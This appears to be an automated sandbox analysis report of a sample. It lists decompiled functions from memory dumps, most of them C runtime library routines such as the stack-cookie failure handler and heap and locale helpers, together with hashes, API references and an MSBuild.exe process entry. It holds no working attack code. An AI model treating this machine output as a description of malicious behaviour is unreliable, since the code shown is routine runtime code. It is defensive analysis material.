Function 00AB1275, Relevance: 1.3, APIs: 1, Instructions: 11sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,034CF0BF), ref: 00AB1290

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 500a5dba8544d03b0f74fe39aa770856ad5b41a84bb0e0573ff5a815eaa9823a
Instruction ID: e72f3bc4150f5031d7c379114d6ce44a2444d859b1ff9e3a85451842ec483f17
Opcode Fuzzy Hash: 500a5dba8544d03b0f74fe39aa770856ad5b41a84bb0e0573ff5a815eaa9823a
Instruction Fuzzy Hash: 71C02B710903082BC54DF7F0CE4BD5E7B0C0B20B03B00810B370816043CD7CD1048079

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003212F4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E003212F4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x32a004; // 0xf1838a0e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x362778 = _t6;
				 *0x362774 = _t22;
				 *0x362770 = _t25;
				 *0x36276c = _t21;
				 *0x362768 = _t27;
				 *0x362764 = _t26;
				 *0x362790 = ss;
				 *0x362784 = cs;
				 *0x362760 = ds;
				 *0x36275c = es;
				 *0x362758 = fs;
				 *0x362754 = gs;
				asm("pushfd");
				_pop( *0x362788);
				 *0x36277c =  *_t31;
				 *0x362780 = _v0;
				 *0x36278c =  &_a4;
				 *0x3626c8 = 0x10001;
				_t11 =  *0x362780; // 0x0
				 *0x36267c = _t11;
				 *0x362670 = 0xc0000409;
				 *0x362674 = 1;
				_t12 =  *0x32a004; // 0xf1838a0e
				_v812 = _t12;
				_t13 =  *0x32a008; // 0xe7c75f1
				_v808 = _t13;
				 *0x3626c0 = IsDebuggerPresent();
				_push(1);
				E00322BB2(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("p&6");
				if( *0x3626c0 == 0) {
					_push(1);
					E00322BB2(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x003212f4
0x003212f4
0x003212f4
0x003212f4
0x003212f4
0x003212f4
0x003212f4
0x003212fa
0x003212fc
0x003212fc
0x00321493
0x00321498
0x0032149e
0x003214a4
0x003214aa
0x003214b0
0x003214b6
0x003214bd
0x003214c4
0x003214cb
0x003214d2
0x003214d9
0x003214e0
0x003214e1
0x003214ea
0x003214f2
0x003214fa
0x00321505
0x0032150f
0x00321514
0x00321519
0x00321523
0x0032152d
0x00321532
0x00321538
0x0032153d
0x00321549
0x0032154e
0x00321550
0x00321558
0x00321563
0x00321570
0x00321572
0x00321574
0x00321579
0x0032158d

APIs

IsDebuggerPresent.KERNEL32 ref: 00321543
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00321558
UnhandledExceptionFilter.KERNEL32(p&6), ref: 00321563
GetCurrentProcess.KERNEL32(C0000409), ref: 0032157F
TerminateProcess.KERNEL32(00000000), ref: 00321586

Strings

p&6, xrefs: 0032155E

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: p&6
API String ID: 2579439406-2815731711
Opcode ID: 8333b8fa837a81053fc3bbe6b32b52f9ce71a0cf62b4e30e3c44eb6715da56f2
Instruction ID: 5ff62258254844c2a218f58acd36a0f9bc23d134e05418156f2fb60e97bc4176
Opcode Fuzzy Hash: 8333b8fa837a81053fc3bbe6b32b52f9ce71a0cf62b4e30e3c44eb6715da56f2
Instruction Fuzzy Hash: EA21CEB4901B049FD713DF28FD49A463BBCFB18301F128119E90887262EBF459868F15

Uniqueness

Uniqueness Score: -1.00%

Function 00326D6C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00326D6C(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, int _a4) {
				signed int _v8;
				char _v10;
				char _v16;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t18 = __edx;
				_t14 = __ebx;
				_t7 =  *0x32a004; // 0xf1838a0e
				_v8 = _t7 ^ _t21;
				_v10 = 0;
				_t10 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t10 != 0) {
					_t12 = E00326FA1( &_v16);
				} else {
					_t12 = _t10 | 0xffffffff;
				}
				return E003212F4(_t12, _t14, _v8 ^ _t21, _t18, _t19, _t20);
			}

0x00326d6c
0x00326d6c
0x00326d6c
0x00326d6c
0x00326d74
0x00326d7b
0x00326d8c
0x00326d90
0x00326d98
0x00326da3
0x00326d9a
0x00326d9a
0x00326d9a
0x00326db4

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,00000000), ref: 00326D90

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 20a5e4cd04033a8e7112782f24c28907e216e024b9e3696b75cd14d6fd304c6b
Instruction ID: bc6fcc862d0e6c55bafe00f4c5042a105599b50394db4975c76f380a4d35e459
Opcode Fuzzy Hash: 20a5e4cd04033a8e7112782f24c28907e216e024b9e3696b75cd14d6fd304c6b
Instruction Fuzzy Hash: F6F0ED30A0420CBBCF12DBB4AD06B9D7BACAF48314F504168F611DA0C0DAB09A098601

Uniqueness

Uniqueness Score: -1.00%

Function 00AB4BD8, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bb249d58a29a2ec82fee501b4ebf3c4cdc93dfd7e11472db8a2409c42d38311
Instruction ID: 0eb14a407a4a0f01cbee8ddbba0cf7c4983fae580f3c4374255f857577f31654
Opcode Fuzzy Hash: 2bb249d58a29a2ec82fee501b4ebf3c4cdc93dfd7e11472db8a2409c42d38311
Instruction Fuzzy Hash: E5E01A36265504AFCB44CBA8CD81DA5B7FCEB1D720B144290F915C73A2EA34EE40EA50

Uniqueness

Uniqueness Score: -1.00%

Function 00AB4C15, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction ID: 66b6ff57fc2fc00edfd2b862765d929b8a34c02126ad1ef3bd132439739ce549
Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
Instruction Fuzzy Hash: 53E04F322115609BCB219B59C904DD2FBEDEB9DBB07154825ED4997613C230FC00D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00AB13B8, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: d9eebeb796f403316f22326542831f571c57df9c901a8b5608c4a6f2d2cfb308
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: 0DB092606115C04AEB5283248425B4176E4B741B01FC994E0A00586C82D26CC984A100

Uniqueness

Uniqueness Score: -1.00%

Function 00AB4C78, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.221255742.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 003224CC, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E003224CC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t47;

				_t35 = __ebx;
				_push(0xc);
				_push(0x329420);
				E00322934(__ebx, __edi, __esi);
				_t45 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E003215DE(_t45);
				}
				 *(_t47 - 0x1c) = _t23;
				_t46 =  *((intOrPtr*)(_t47 + 8));
				 *((intOrPtr*)(_t46 + 0x5c)) = 0x3287c0;
				 *((intOrPtr*)(_t46 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t46 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t46 + 0x1fc)) = GetProcAddress( *(_t47 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t46 + 0x70)) = 1;
				 *((char*)(_t46 + 0xc8)) = 0x43;
				 *((char*)(_t46 + 0x14b)) = 0x43;
				 *(_t46 + 0x68) = 0x32a3e0;
				E00322D80(_t35, 1, 0xd);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				InterlockedIncrement( *(_t46 + 0x68));
				 *(_t47 - 4) = 0xfffffffe;
				E003225A1();
				E00322D80(_t35, 1, 0xc);
				 *(_t47 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t47 + 0xc));
				 *((intOrPtr*)(_t46 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x32a9e8; // 0x32a910
					 *((intOrPtr*)(_t46 + 0x6c)) = _t32;
				}
				E003246BE( *((intOrPtr*)(_t46 + 0x6c)));
				 *(_t47 - 4) = 0xfffffffe;
				return E00322979(E003225AA());
			}

0x003224cc
0x003224cc
0x003224ce
0x003224d3
0x003224d8
0x003224de
0x003224e6
0x003224e9
0x003224ee
0x003224ef
0x003224f2
0x003224f5
0x003224ff
0x00322504
0x0032250c
0x00322514
0x00322524
0x00322524
0x0032252a
0x0032252d
0x00322534
0x0032253b
0x00322544
0x0032254a
0x00322551
0x00322557
0x0032255e
0x00322565
0x0032256b
0x0032256e
0x00322571
0x00322576
0x00322578
0x0032257d
0x0032257d
0x00322583
0x00322589
0x0032259a

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00329420,0000000C,00322607,00000000,00000000,?,0032194C,00000003,?,?,?,?,?,?,0032131E), ref: 003224DE
__crt_waiting_on_module_handle.LIBCMT ref: 003224E9

Part of subcall function 003215DE: Sleep.KERNEL32(000003E8,00000000,?,0032242F,KERNEL32.DLL,?,0032247B,?,0032194C,00000003), ref: 003215EA
Part of subcall function 003215DE: GetModuleHandleW.KERNEL32(?,?,0032242F,KERNEL32.DLL,?,0032247B,?,0032194C,00000003,?,?,?,?,?,?,0032131E), ref: 003215F3

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00322512
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00322522
__lock.LIBCMT ref: 00322544
InterlockedIncrement.KERNEL32(0032A3E0), ref: 00322551
__lock.LIBCMT ref: 00322565
___addlocaleref.LIBCMT ref: 00322583

Strings

KERNEL32.DLL, xrefs: 003224D8, 003224DD, 003224E8
DecodePointer, xrefs: 0032251A
EncodePointer, xrefs: 00322506

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 8dd79d729f999192d66357188158d957e0bf5c1036549db05512c54892b1cdac
Instruction ID: b22a0e347b06c0a8bd26b92607dc758e69a2fed9436bc210a64caa0737c7e41f
Opcode Fuzzy Hash: 8dd79d729f999192d66357188158d957e0bf5c1036549db05512c54892b1cdac
Instruction Fuzzy Hash: D011DF70801B21AFD722AF35FD02B8ABBE0AF05310F20851EE4999B2A0CB709A41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00323C61, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00323C61(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x329550);
				E00322934(__ebx, __edi, __esi);
				_t31 = E0032262C(__ebx, _t35);
				_t15 =  *0x32aa00; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00322D80(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x32a808; // 0x2801600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x32a3e0;
								if(__eflags != 0) {
									_push(_t33);
									E003238CE(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x32a808; // 0x2801600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x32a808; // 0x2801600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00323CFC();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0032160E(_t29, 0x20);
				}
				return E00322979(_t33);
			}

0x00323c61
0x00323c61
0x00323c61
0x00323c61
0x00323c63
0x00323c68
0x00323c72
0x00323c74
0x00323c7c
0x00323c9d
0x00323ca3
0x00323ca7
0x00323caa
0x00323cad
0x00323cb3
0x00323cb5
0x00323cb7
0x00323cba
0x00323cc0
0x00323cc2
0x00323cc4
0x00323cca
0x00323ccc
0x00323ccd
0x00323cd2
0x00323cca
0x00323cc2
0x00323cd3
0x00323cd8
0x00323cdb
0x00323ce1
0x00323ce5
0x00323ce5
0x00323ceb
0x00323cf2
0x00323c84
0x00323c84
0x00323c84
0x00323c89
0x00323c8d
0x00323c92
0x00323c9a

APIs

__getptd.LIBCMT ref: 00323C6D

Part of subcall function 0032262C: __getptd_noexit.LIBCMT ref: 0032262F
Part of subcall function 0032262C: __amsg_exit.LIBCMT ref: 0032263C

__amsg_exit.LIBCMT ref: 00323C8D
__lock.LIBCMT ref: 00323C9D
InterlockedDecrement.KERNEL32(?), ref: 00323CBA
InterlockedIncrement.KERNEL32(02801600), ref: 00323CE5

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 86466746d807c91b2ed5858de3252c9939531f51ded4534b1e1e80027cd072e5
Instruction ID: 886e8d646b297d0c3e75c73beb0eccd8da6b98bae3fb7a3dc657b0d4f02ea5f6
Opcode Fuzzy Hash: 86466746d807c91b2ed5858de3252c9939531f51ded4534b1e1e80027cd072e5
Instruction Fuzzy Hash: 27019631E01F31ABD723AB64B90576E77A4BF04710F164119F8017B591CB38AA82DBD6

Uniqueness

Uniqueness Score: -1.00%

Function 003238CE, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E003238CE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x329530);
				_t8 = E00322934(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E00322979(_t8);
				}
				if( *0x3630d4 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x362dfc, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00322F52(_t31);
						 *_t10 = E00322F10(GetLastError());
					}
					goto L9;
				}
				E00322D80(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0032489A(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E003248CA();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00323924();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x003238ce
0x003238d0
0x003238d5
0x003238da
0x003238df
0x00323956
0x0032395b
0x0032395b
0x003238e8
0x0032392d
0x0032392e
0x00323936
0x0032393c
0x0032393e
0x00323940
0x00323953
0x00323955
0x00000000
0x0032393e
0x003238ec
0x003238f2
0x003238f7
0x003238fd
0x00323902
0x00323904
0x00323905
0x00323906
0x0032390c
0x0032390d
0x00323914
0x0032391d
0x00000000
0x0032391f
0x0032391f
0x00000000
0x0032391f

APIs

__lock.LIBCMT ref: 003238EC

Part of subcall function 00322D80: __mtinitlocknum.LIBCMT ref: 00322D96
Part of subcall function 00322D80: __amsg_exit.LIBCMT ref: 00322DA2
Part of subcall function 00322D80: EnterCriticalSection.KERNEL32(?,?,?,003258B0,00000004,003295F0,0000000C,003239B7,?,?,00000000,00000000,00000000,?,003225DE,00000001), ref: 00322DAA

___sbh_find_block.LIBCMT ref: 003238F7
___sbh_free_block.LIBCMT ref: 00323906
HeapFree.KERNEL32(00000000,?,00329530,0000000C,00322D61,00000000,00329490,0000000C,00322D9B,?,?,?,003258B0,00000004,003295F0,0000000C), ref: 00323936
GetLastError.KERNEL32(?,003258B0,00000004,003295F0,0000000C,003239B7,?,?,00000000,00000000,00000000,?,003225DE,00000001,00000214), ref: 00323947

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 0e51a97ce0c0a97f3540acde5092d45376f962d161ec1471d85fa89c6eb4a75e
Instruction ID: d9c230a4bf8dd8a9a3fec2f07b8e6db5c190ad4dab1a7b7f9c532a9189abda4d
Opcode Fuzzy Hash: 0e51a97ce0c0a97f3540acde5092d45376f962d161ec1471d85fa89c6eb4a75e
Instruction Fuzzy Hash: 1E016271905736FADF236F70BC06B5E7BA8AF02760F114119F414AA091CBB886C1DA59

Uniqueness

Uniqueness Score: -1.00%

Function 00324824, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00324824(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x329590);
				E00322934(__ebx, __edi, __esi);
				_t29 = E0032262C(__ebx, _t31);
				_t13 =  *0x32aa00; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00322D80(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x32a9e8; // 0x32a910
					 *((intOrPtr*)(_t30 - 0x1c)) = E003247E6(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0032488E();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0032262C(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0032160E(_t25, 0x20);
				}
				return E00322979(_t29);
			}

0x00324824
0x00324824
0x00324824
0x00324824
0x00324824
0x00324826
0x0032482b
0x00324835
0x00324837
0x0032483f
0x00324863
0x00324865
0x0032486b
0x0032486f
0x00324872
0x0032487d
0x00324880
0x00324887
0x00324841
0x00324841
0x00324845
0x00000000
0x00324847
0x0032484c
0x0032484c
0x00324845
0x00324851
0x00324855
0x0032485a
0x00324862

APIs

__getptd.LIBCMT ref: 00324830

Part of subcall function 0032262C: __getptd_noexit.LIBCMT ref: 0032262F
Part of subcall function 0032262C: __amsg_exit.LIBCMT ref: 0032263C

__getptd.LIBCMT ref: 00324847
__amsg_exit.LIBCMT ref: 00324855
__lock.LIBCMT ref: 00324865

Memory Dump Source

Source File: 00000000.00000002.220916116.0000000000321000.00000020.00020000.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.220907638.0000000000320000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220930709.0000000000328000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.220940423.000000000032A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.221129916.0000000000365000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: b197006432035d0bdf352045885246048a88cb2d5b8dc8adcb6b4c47b48d5759
Instruction ID: 73769861f90a59c2481dbd14e68831caa4fc2a20ca1431f34d36368bdb89eadf
Opcode Fuzzy Hash: b197006432035d0bdf352045885246048a88cb2d5b8dc8adcb6b4c47b48d5759
Instruction Fuzzy Hash: B3F0B432A107349FE723FBB4B80375E33A0AF00720F124209E4519F2D2CB749941CB92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 5292 Parent PID: 528 MSBuild.exeCOMMON

Executed Functions

Function 05191DF8, Relevance: 1.6, Strings: 1, Instructions: 386COMMON

Download Yara Rule

Strings

</kr, xrefs: 05191FD9

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID: </kr
API String ID: 0-2427075492
Opcode ID: 5ef707ebd3cadd6013be1d30e0489d89a3521f17c36674edce8085798c3cb0fb
Instruction ID: 1d329d4149b08f9e296f1201185f4bb2932ef6d956a918c5766065d1fef85665
Opcode Fuzzy Hash: 5ef707ebd3cadd6013be1d30e0489d89a3521f17c36674edce8085798c3cb0fb
Instruction Fuzzy Hash: C9F19234700209DFCB19DF28C488A69BBF6FF84310F5A84A9D4168B665DB74FD85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05192670, Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 051926B8

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: ac80907ddb9dff002f1de555c419725c051eb5a41839b2acdf4ed42a58cf1ad4
Instruction ID: 333dbd14de41fdf92d236b9f44456a2c6edc422fa606bdb41a463ee358ca79dc
Opcode Fuzzy Hash: ac80907ddb9dff002f1de555c419725c051eb5a41839b2acdf4ed42a58cf1ad4
Instruction Fuzzy Hash: 8A71A039B00210EFDB2CDB64D954F6A77E2BF84710F11806AE52AAF691DB79EC40C790

Uniqueness

Uniqueness Score: -1.00%

Function 05191890, Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

</kr, xrefs: 051918BC

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID: </kr
API String ID: 0-2427075492
Opcode ID: 69d28e818142c164689764b9c4d0e5146954e68500948aa8e7e8a25c9cb2f37f
Instruction ID: a3289b466d3a5e52b4a10c57f4af96c5dbe15731bbae8fdfd21adcabd53bf1de
Opcode Fuzzy Hash: 69d28e818142c164689764b9c4d0e5146954e68500948aa8e7e8a25c9cb2f37f
Instruction Fuzzy Hash: C051A03170024A9FCB05DF68C898AAE7BF6FF85300F09846AE415DB2A1DB34ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05191C41, Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

</kr, xrefs: 05191C78

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID: </kr
API String ID: 0-2427075492
Opcode ID: 269622eea1d20eaff5093f1647b7c29914ed3a6c8d0bde1dd29c6018ac849a92
Instruction ID: 542ee0b010a462d867f75e65afc0d087bf6e271f4223036f8142bf777e22bd19
Opcode Fuzzy Hash: 269622eea1d20eaff5093f1647b7c29914ed3a6c8d0bde1dd29c6018ac849a92
Instruction Fuzzy Hash: 19313834B001059BCB18EBB8D498AAD7BE7AFC9324F24456AE112DB3E0DF759C45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0519014F, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 051901A7

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: 74c2f6e000a8ca181003b1dc73cdfedded77b6b14c0854cbabb92a6298d2d5f5
Instruction ID: e8811c9afc47859de3cfcf57e03fa8c4c46903a7415fb66a12bb391029da86ce
Opcode Fuzzy Hash: 74c2f6e000a8ca181003b1dc73cdfedded77b6b14c0854cbabb92a6298d2d5f5
Instruction Fuzzy Hash: 95211276E00148AFDB05DFA5EC889DEBBB6FF8C310F14412AE505F7260DB345A419B91

Uniqueness

Uniqueness Score: -1.00%

Function 05190160, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 051901A7

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: 3e8364b2eee29745e210a909661ce46c8769c744a7c19f80569ff0db235d769f
